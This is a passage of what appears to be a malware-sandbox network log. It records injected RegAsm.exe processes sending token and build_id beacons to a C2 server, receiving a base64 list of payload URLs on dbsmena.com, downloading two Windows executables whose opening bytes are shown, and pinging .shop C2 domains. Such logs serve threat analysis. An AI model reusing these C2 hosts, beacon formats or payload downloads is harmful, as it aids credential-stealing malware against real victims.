2024-09-26 20:56:55 UTC	15812	OUT	Data Raw: 78 7a 36 63 6b 44 6e 76 53 31 36 36 61 65 78 38 36 34 75 4f 36 43 69 69 6a 6e 5a 49 2b 31 69 6b 65 4e 37 68 53 56 54 50 41 79 65 67 7a 51 32 6c 75 43 69 35 61 49 4b 36 62 77 70 34 67 73 39 44 53 37 46 30 6b 7a 65 63 55 4b 2b 55 6f 50 54 4f 63 35 49 39 61 35 70 56 64 78 6c 49 70 58 42 63 52 35 53 4d 73 4e 78 36 4c 77 4f 70 39 4b 62 44 75 75 53 67 74 34 35 5a 69 37 37 46 45 55 62 4d 53 32 4d 34 47 42 31 77 43 63 56 7a 34 69 6e 53 72 51 64 4f 63 72 48 5a 67 71 31 66 44 56 46 56 70 78 75 2f 4e 4d 39 4a 2f 77 43 45 2b 30 6e 2f 41 4a 34 33 6e 2f 66 74 66 2f 69 71 54 2f 68 50 74 4a 2f 35 34 58 76 2f 41 48 37 58 2f 77 43 4b 72 7a 69 59 50 62 79 53 78 7a 77 7a 52 53 52 4b 47 6b 57 53 4a 6c 4b 41 6b 41 45 67 6a 67 63 6a 72 36 30 4c 75 6b 6d 69 68 6a 6a 6b 65 57 5a Data Ascii: xz6ckDnvS166aex864uO6CiijnZI+1ikeN7hSVTPAyegzQ2luCi5aIK6bwp4gs9DS7F0kzecUK+UoPTOc5I9a5pVdxlIpXBcR5SMsNx6LwOp9KbDuuSgt45Zi77FEUbMS2M4GB1wCcVz4inSrQdOcrHZgq1fDVFVpxu/NM9J/wCE+0n/AJ43n/ftf/iqT/hPtJ/54Xv/AH7X/wCKrziYPbySxzwzRSRKGkWSJlKAkAEgjgcjr60LukmihjjkeWZ
2024-09-26 20:56:56 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 20:56:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 20:56:56 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49763	5.75.211.162	443	7476	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 20:56:57 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJDAECAEBKJJJKEBKKJD User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 20:56:57 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 44 41 45 43 41 45 42 4b 4a 4a 4a 4b 45 42 4b 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 32 33 36 31 36 66 37 38 62 36 33 30 32 61 32 39 33 63 38 32 65 33 35 30 31 62 37 30 33 36 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 41 45 43 41 45 42 4b 4a 4a 4a 4b 45 42 4b 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 37 34 32 36 31 64 38 33 34 34 31 33 65 38 38 36 66 39 32 30 61 31 65 39 64 63 35 62 33 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 41 45 43 41 45 42 4b 4a 4a 4a 4b 45 42 4b 4b 4a 44 0d 0a 43 6f 6e 74 Data Ascii: ------KJDAECAEBKJJJKEBKKJDContent-Disposition: form-data; name="token"c23616f78b6302a293c82e3501b7036e------KJDAECAEBKJJJKEBKKJDContent-Disposition: form-data; name="build_id"4b74261d834413e886f920a1e9dc5b33------KJDAECAEBKJJJKEBKKJDCont
2024-09-26 20:56:58 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 20:56:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 20:56:58 UTC	135	IN	Data Raw: 37 63 0d 0a 4d 54 49 78 4f 54 63 30 4d 58 78 6f 64 48 52 77 63 7a 6f 76 4c 32 52 69 63 32 31 6c 62 6d 45 75 59 32 39 74 4c 32 78 71 61 47 64 6d 63 32 51 75 5a 58 68 6c 66 44 46 38 61 32 74 72 61 33 77 78 4d 6a 45 35 4e 7a 51 79 66 47 68 30 64 48 42 7a 4f 69 38 76 5a 47 4a 7a 62 57 56 75 59 53 35 6a 62 32 30 76 64 6d 52 7a 61 47 5a 6b 4c 6d 56 34 5a 58 77 78 66 47 74 72 61 32 74 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 7cMTIxOTc0MXxodHRwczovL2Ric21lbmEuY29tL2xqaGdmc2QuZXhlfDF8a2tra3wxMjE5NzQyfGh0dHBzOi8vZGJzbWVuYS5jb20vdmRzaGZkLmV4ZXwxfGtra2t80

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49764	172.105.54.160	443	7476	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 20:56:59 UTC	171	OUT	GET /ljhgfsd.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: dbsmena.com Cache-Control: no-cache
2024-09-26 20:57:00 UTC	284	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 20:56:59 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Thu, 26 Sep 2024 16:59:48 GMT ETag: "c218c-5e028-62308aa93ecb1" Accept-Ranges: bytes Content-Length: 385064 Content-Type: application/x-msdownload
2024-09-26 20:57:00 UTC	7908	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ec 91 f5 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 b0 05 00 00 08 00 00 00 00 00 00 3e ce 05 00 00 20 00 00 00 e0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELf> @ `
2024-09-26 20:57:00 UTC	8000	IN	Data Raw: 13 ef d2 a2 82 10 e4 7b 18 b1 3b 98 2a 47 7f 40 7c 65 20 fd 2e a9 40 96 75 f4 7a a2 0d dd d5 19 59 97 3c 4a 80 e4 e6 3b 9d 07 a4 29 69 dd a7 93 7e 44 db f2 c7 f2 fb b3 49 1a e8 f0 62 2e 1c 2f f2 0f a7 c2 d1 41 28 2e de 6a 3a 64 72 a0 99 67 58 1d ae 19 6c 5d 2d a4 25 2c ed ae 41 0e db 5a c3 ec 3b 9b 76 46 db 2b 85 95 f7 dd 6a 6d f5 5f 6d 16 68 d3 9d b5 fb 1d 3a 90 c1 32 23 71 e9 7c 94 30 36 fc 99 f8 aa 24 6d 43 a4 b4 0d e5 22 91 9e 99 f3 99 e9 53 8d 37 87 ea c1 e3 ab 30 d7 33 5d b0 e9 2e c9 a8 85 5b e6 07 06 97 27 d4 5d 18 e8 9e 18 10 0b 1a 47 40 b9 09 22 8f 06 18 ba 1a 01 0b 71 80 63 15 ee 60 a6 f4 c4 86 57 b8 fb c9 5f 52 3c 06 a0 96 59 74 bd d9 e9 f4 85 df 89 25 14 0e bf 0d 47 ca 17 d1 28 0b 73 5f 18 8b e1 01 37 be dc f1 bf 11 d9 84 f4 62 d4 08 c8 44 8c Data Ascii: {;*G@\|e .@uzY<J;)i~DIb./A(.j:drgXl]-%,AZ;vF+jm_mh:2#q\|06$mC"S703].[']G@"qc`W_R<Yt%G(s_7bD
2024-09-26 20:57:00 UTC	8000	IN	Data Raw: 04 f2 f3 42 4b f0 da d7 38 cd 18 14 d2 03 7f 1b cb f1 cf 8e fb f0 d4 ef 03 28 13 e9 2c 87 fa 8a 86 3e 1d 87 9f 5d f7 94 00 33 ed 3a 49 f6 49 f5 d9 b6 69 62 bc 77 3e 12 bb 48 4f 3d 43 7a 74 a8 b7 05 e9 88 fd 24 82 47 03 83 bd 8b d7 17 5c 79 de 65 be df 3a 01 25 d1 cd 00 93 4a b3 8d 9a eb 0e cf af c0 24 05 b4 c2 95 d7 4f ab fa 0d b7 bd 2d f5 86 30 40 14 52 b9 ae 2b 86 a0 c0 66 6e 57 e6 a2 6d 06 73 ff ce e2 c0 93 ba 43 bb 24 20 01 2d 49 a4 24 d3 98 27 9d 0f 37 6c f9 82 31 f3 02 ab c7 d1 99 c1 85 92 50 8c bc c6 51 27 bf e3 f8 73 30 66 df 44 71 94 ab cb aa 0d d6 b9 89 9c 85 37 54 f2 46 a1 91 3c 2b cf 06 93 8c 5d f3 62 ee 62 2e f5 43 7f b6 f9 8d ac 9f 05 e8 a8 78 42 92 a0 9a a1 38 f1 7d 3a 03 46 20 16 7c f4 78 26 56 23 63 c6 88 37 65 8f 38 24 b2 af bb 2c 96 c8 Data Ascii: BK8(,>]3:IIibw>HO=Czt$G\ye:%J$O-0@R+fnWmsC$ -I$'7l1PQ's0fDq7TF<+]bb.CxB8}:F \|x&V#c7e8$,
2024-09-26 20:57:00 UTC	8000	IN	Data Raw: c3 65 84 87 a2 af fb f7 e6 c8 0e e6 86 18 4b aa 8b 5f 54 d7 43 e8 94 03 b8 52 bc 83 5e a0 35 4d cc b1 67 63 f7 bf b5 e1 a2 47 e2 b2 a5 d7 79 db 4f 8b 53 5d 39 81 b3 9b 8b 90 a6 5d 48 0c f5 42 19 6d 59 ea dd 51 50 fe 01 4c 7d 60 e5 44 74 e5 d5 f3 bd 20 69 54 d6 95 c7 fa ec b1 b0 97 d4 5d c6 d1 0d f3 01 0d 0b 7a 9a e1 85 56 07 8c 0d 32 30 36 d8 71 c1 55 e4 47 cd 9b 2d ff 07 17 9b d0 63 61 06 b4 76 71 a6 aa fe b8 24 6f e4 b9 6e 21 73 27 34 87 33 35 7d 89 ae ec 37 8b 64 34 e9 31 cc 0e e7 e1 7b 7e d8 1b 8e 39 90 35 94 c8 dd c6 4f 63 ec 2c bb db 61 69 8a 2a 81 ca f7 a3 9b ea e9 b4 85 b9 54 2a 2a 91 51 5e f2 1f b2 f2 20 22 cf fb 92 bc 7b 2e 35 2f 69 0b e2 2b d1 ed ca 2a 7d b0 96 a7 4f e1 20 ff af 7d 53 a2 0b d2 ea 31 1a 3d d8 b2 42 18 c4 03 e4 3e 96 72 ff cd af Data Ascii: eK_TCR^5MgcGyOS]9]HBmYQPL}`Dt iT]zV206qUG-cavq$on!s'435}7d41{~95Oc,aiTQ^ "{.5/i+}O }S1=B>r
2024-09-26 20:57:00 UTC	8000	IN	Data Raw: 29 e9 67 04 44 cb c0 e1 aa 06 c1 7f 0b 0f 71 8e 31 e2 d8 93 fc f9 79 23 df 84 15 ae 82 af e8 60 50 3c 25 90 b1 b0 4a b3 40 26 0b 02 cf 0c 30 a9 87 06 9b 9c c1 10 fb 73 e8 18 53 60 e6 9a e3 33 92 dc b9 d2 c5 43 89 15 7c 46 02 30 cf 53 7c 77 12 37 27 f1 9f 6e c3 08 0b 59 26 f1 12 9a 7a cb 55 04 87 48 f4 04 13 92 3d 5a 1c 47 b4 81 7c 67 3d 02 c9 06 15 16 fb 78 6b 0c 09 60 09 0d b7 80 68 39 e9 a8 65 c9 b4 9a 90 00 62 6c 9e 41 c7 5e c2 08 c9 46 b9 2f ba a4 76 b6 e6 74 7f e5 90 a2 52 c1 57 7a 8a 1b fd 4d a4 64 bf 25 78 5f aa 9b 76 e7 af 99 23 46 51 12 2a 85 a7 6e 22 e8 86 00 4b 57 63 fe 1d b7 20 8d 06 19 5d dd 27 80 6b a2 39 24 8d 40 d3 8f 38 70 1f 2a 01 2e b2 fe 92 a8 1a c5 f8 1f f6 74 c2 1f 9b 15 3b 94 22 4e 5d 60 5b 48 2a ea 33 b9 88 c5 10 79 87 ae bd bc b7 Data Ascii: )gDq1y#`P<%J@&0sS`3C\|F0S\|w7'nY&zUH=ZG\|g=xk`h9eblA^F/vtRWzMd%x_v#FQn"KWc ]'k9$@8p.t;"N]`[H*3y
2024-09-26 20:57:00 UTC	8000	IN	Data Raw: fc 9b cf 45 f9 61 e3 65 71 bb 52 77 76 f9 01 61 ee 6c cd 55 03 42 b2 92 41 d5 40 03 3b fd a7 8d db df 78 0d 90 2e 78 b9 57 34 64 76 f1 01 aa cf b5 6e ca f8 6f 25 1f 2a d4 72 fb 3d 73 73 e3 97 e0 c2 76 a4 39 f8 54 6f fe 9b 90 3c 0e ec 80 86 fb cb fd 59 6c c9 13 88 d2 a4 66 46 1c c9 52 4c 2e e2 ec 14 0b 41 30 61 3e 98 e2 1d a2 9e b3 80 5b cb df 71 9e 15 c2 d0 08 7c 73 d6 65 14 4f 18 32 5e f9 80 d5 9c 30 88 f2 9e d0 17 4e 99 e7 ca 82 21 dd b1 5c 07 0b c7 dc 19 3f 0f e8 43 c4 cd 96 27 fe 39 59 a2 4e 0d b7 f5 d5 1e 12 49 af f9 e3 d1 e7 1e 68 4a ea 16 47 ba 78 9e c0 e1 46 48 29 6b ac c9 29 40 44 68 6c 40 12 41 f0 db 27 15 a8 b2 0a 56 f9 f6 64 a8 a3 40 c3 16 25 8c 9a 8c 89 ee 0d 10 a8 40 f8 30 9f 71 fb 47 2b bb ca a1 ce b2 aa 46 bc b7 35 85 6b bd 54 8b 8b d9 c9 Data Ascii: EaeqRwvalUBA@;x.xW4dvno%*r=ssv9To<YlfFRL.A0a>[q\|seO2^0N!\?C'9YNIhJGxFH)k)@Dhl@A'Vd@%@0qG+F5kT
2024-09-26 20:57:00 UTC	8000	IN	Data Raw: 4f d2 b1 20 a6 2b ff 92 3e ed d9 5c 12 82 65 d5 20 04 cf 4c 41 62 74 b9 2f c5 8f 60 78 f5 d3 76 cd 3e 1c 42 c9 50 f0 07 55 5b e5 70 c1 aa f1 be c7 58 d8 70 14 e1 b9 bd c9 ca e1 52 f3 a7 0c 8e 69 9e cd d8 ed fa 0f 90 57 ec 80 9c 44 57 df ea e7 70 4d d4 27 b0 9b 62 7e 0e ff e5 2c 65 0f 5c d7 bf c7 2a 9b 09 7b 72 0c 9b fe b1 ef 88 05 e1 9d 66 1e 8d cc 9a 4d 93 bb 36 ba 70 31 3c 66 2e e5 46 1d f5 0b eb b2 0c 30 8e 6b e5 37 14 20 6a d9 1d 3a 92 1e 24 d7 b7 33 e3 9d a1 32 1d fd 69 4a c6 07 9f ca bb 17 d8 97 26 e5 cb 1e 18 42 f3 0b cc 5f 89 14 b5 62 99 54 09 5d 0f 66 77 1e 5d 37 d3 99 42 84 49 e2 45 56 1e 63 c0 77 3c ce d1 9d 4a 28 3d b2 35 72 38 e9 ab 3e 5c ee 95 cb df 16 75 4d 1d 42 77 8a 94 fe 42 0d bc df bc 91 6f 0a b5 c7 1d 44 05 fd 00 64 9f 87 00 eb a3 db Data Ascii: O +>\e LAbt/`xv>BPU[pXpRiWDWpM'b~,e\*{rfM6p1<f.F0k7 j:$32iJ&B_bT]fw]7BIEVcw<J(=5r8>\uMBwBoDd
2024-09-26 20:57:00 UTC	8000	IN	Data Raw: 84 df 03 6a b4 83 3c a2 8d 9f df 03 18 76 b5 b3 73 92 1c 49 a7 e0 f4 74 89 d5 b1 90 26 ab 47 40 4a 37 13 54 81 f2 79 82 ec f5 26 2e e0 a3 d2 a1 b0 43 e0 d0 31 d3 4f e0 56 5d fd 6a f1 51 d9 fd e7 70 e9 28 5d 93 bb 56 ae c4 d7 bf 72 00 73 39 5d 00 76 f2 e9 19 b2 b1 fe d2 c6 01 68 4e 4b d1 99 8c e4 2e 73 01 93 e6 21 e8 97 ef 61 42 97 67 fd 4e c0 fc e0 ea 07 2c 28 60 15 58 b4 a9 fe 6e c1 4c 75 5a 72 75 c4 39 ec 40 61 6b 4a 79 51 43 1c 75 5d d0 dc ae 9d 1c 13 b2 f8 57 10 24 ab 33 5f 36 03 c7 e4 f9 2c 8d 0f d8 37 8f 1f ba fc 92 85 86 a1 83 8a ea 38 9b a3 52 1f db fd 32 c7 57 c9 c3 63 e4 81 2a 0c de e8 d4 bd 53 f1 eb 09 56 a6 0f 51 79 03 13 e3 46 2d 5f 16 a8 0a e1 bc 7d 83 db 29 a1 fa 77 1a 84 fc c7 b8 a8 0b 6b c1 6f 51 13 f0 24 62 6c 31 fe d9 41 d1 de e7 ea 0d Data Ascii: j<vsIt&G@J7Ty&.C1OV]jQp(]Vrs9]vhNK.s!aBgN,(`XnLuZru9@akJyQCu]W$3_6,78R2Wc*SVQyF-_})wkoQ$bl1A
2024-09-26 20:57:00 UTC	8000	IN	Data Raw: 98 88 95 12 39 83 a7 08 39 97 43 6f e4 c5 55 c9 0c ee 6f 08 19 a6 1c 65 c7 6d 29 73 ce 02 ed 72 21 15 cd e2 dd e2 9c 1d 77 5d 0b b5 4b f0 4c 7a 79 8f ea ce ad a1 ca 06 94 58 02 a4 1f 36 e1 2d 98 73 71 6a bd f4 07 63 ab 1f 96 1b 4d c4 13 f4 25 24 4b a9 d2 c7 e6 17 17 72 e5 d5 1e a3 0e d8 83 19 46 08 2f 1d 3e ab fa c2 12 5d 84 dc 7b 6c 09 cc e8 57 0e 5d 17 4a 74 68 8e 99 93 6d b8 36 cf 52 54 3f cc d4 16 f9 31 e2 d5 29 06 30 2f 77 35 36 80 9b 23 e9 8e 72 8b 27 d8 75 f3 17 bd b5 0a 3a f9 eb c2 c7 8b 6f 6b 57 42 6e 6e 23 d5 bc 35 5c 6a 30 23 0b 6a df 2e 64 76 54 35 15 e4 c4 83 89 be af 4b 42 64 49 83 02 e3 7c 8c 42 f2 4e 37 10 71 5b db 0e 89 3a 84 ce 84 c5 3f 0f a9 57 b5 f4 db f3 8a 5f e2 60 5b 39 74 d7 61 e3 ff 4f a5 35 fb 5a b7 82 2d 09 3f 88 93 e8 da 4d 87 Data Ascii: 99CoUoem)sr!w]KLzyX6-sqjcM%$KrF/>]{lW]Jthm6RT?1)0/w56#r'u:okWBnn#5\j0#j.dvT5KBdI\|BN7q[:?W_`[9taO5Z-?M
2024-09-26 20:57:00 UTC	8000	IN	Data Raw: 1a 06 41 2d 9f a0 a9 d8 6d cc d1 be 4a 46 7b 32 c2 98 39 d3 d1 00 02 a7 6b ed 0f 4a c5 cb d5 af 51 d2 6e 1e ba af 46 9b 31 4f ba ca 45 60 a2 08 f9 79 ba 8a 67 19 f6 40 42 68 83 da b4 cd d5 9b 0c ff eb cf d4 ce ad 88 26 a0 bd 98 31 b7 1d 57 b7 25 74 06 d4 3f 08 e6 6f 1c af 38 03 a4 14 59 43 cd 3b 2f 60 d9 80 c8 27 f3 99 b0 02 9f 3c af e0 8b 97 29 92 eb 29 b3 54 52 30 87 e8 ea 13 5f de 19 aa a5 9c 3b d7 82 b6 49 80 67 76 79 66 ad d2 69 d5 0e 8b ed 00 f7 55 6c ce 7d f3 9a 11 5f 38 06 9d 04 e0 aa 7c b5 48 3d 51 05 fc a3 43 a2 2e 98 99 80 07 3a a3 b8 63 df be 39 64 7e 1e 75 32 03 29 16 79 4c 1b ef 3d eb a1 c7 1f da e7 02 0f f5 71 c9 93 2d 52 50 b1 00 bd 83 25 c3 75 72 8b 38 be 60 ed 71 c8 99 1f 35 00 df 27 b1 b0 d2 ee dc aa e8 16 20 3a 40 45 8d 59 d3 32 9b b8 Data Ascii: A-mJF{29kJQnF1OE`yg@Bh&1W%t?o8YC;/`'<))TR0_;IgvyfiUl}_8\|H=QC.:c9d~u2)yL=q-RP%ur8`q5' :@EY2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49765	5.75.211.162	443	7476	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 20:57:02 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIJDGIJJKEGIEBGCGDHC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 499 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 20:57:02 UTC	499	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 49 4a 44 47 49 4a 4a 4b 45 47 49 45 42 47 43 47 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 32 33 36 31 36 66 37 38 62 36 33 30 32 61 32 39 33 63 38 32 65 33 35 30 31 62 37 30 33 36 65 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 44 47 49 4a 4a 4b 45 47 49 45 42 47 43 47 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 37 34 32 36 31 64 38 33 34 34 31 33 65 38 38 36 66 39 32 30 61 31 65 39 64 63 35 62 33 33 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 44 47 49 4a 4a 4b 45 47 49 45 42 47 43 47 44 48 43 0d 0a 43 6f 6e 74 Data Ascii: ------FIJDGIJJKEGIEBGCGDHCContent-Disposition: form-data; name="token"c23616f78b6302a293c82e3501b7036e------FIJDGIJJKEGIEBGCGDHCContent-Disposition: form-data; name="build_id"4b74261d834413e886f920a1e9dc5b33------FIJDGIJJKEGIEBGCGDHCCont
2024-09-26 20:57:02 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 20:57:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 20:57:02 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49766	188.114.97.3	443	8136	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 20:57:02 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: ghostreedmnu.shop
2024-09-26 20:57:02 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 20:57:02 UTC	778	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 20:57:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=e5mq0jm4p2r010ti3tfefbrq15; expires=Mon, 20 Jan 2025 14:43:41 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3MkpXYozCd%2BteIarmXmpCSJ2iPlfrLfsUhOs%2B%2FIbamEcfipObZ70NF1QSEON1BKLVOn8SDVDrRRt2rZ6q4%2BQDlGrk76hUjxjOdZTL5A%2BIFOJLMvRg4aiyfc7EaN5Fd7pa3bjkg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c9629fe390e435e-EWR
2024-09-26 20:57:02 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 20:57:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49767	104.21.4.136	443	8136	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 20:57:03 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: gutterydhowi.shop
2024-09-26 20:57:03 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 20:57:03 UTC	780	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 20:57:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=2s0bbkjcf2304tgdsejubd6nch; expires=Mon, 20 Jan 2025 14:43:42 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hj5WbBiUElgigNTfIrbnSdGdvOJqFb%2FwNQ4t6Awhb4DgYuWR%2BWspUP5AWLv%2BHvkashBNHXl%2BApPjIoFXdaRjEVGvpPw%2FvN3DJmCUGUNH52vDPAz7XBAmcgpYsoB2G4I5c%2FHolA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c962a041eae43be-EWR
2024-09-26 20:57:03 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 20:57:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49768	172.105.54.160	443	7476	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 20:57:03 UTC	170	OUT	GET /vdshfd.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: dbsmena.com Cache-Control: no-cache
2024-09-26 20:57:04 UTC	284	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 20:57:04 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Thu, 26 Sep 2024 16:59:47 GMT ETag: "c09a7-64e28-62308aa791e92" Accept-Ranges: bytes Content-Length: 413224 Content-Type: application/x-msdownload
2024-09-26 20:57:04 UTC	7908	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 c2 91 f5 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 1e 06 00 00 08 00 00 00 00 00 00 3e 3c 06 00 00 20 00 00 00 40 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELf>< @@ `
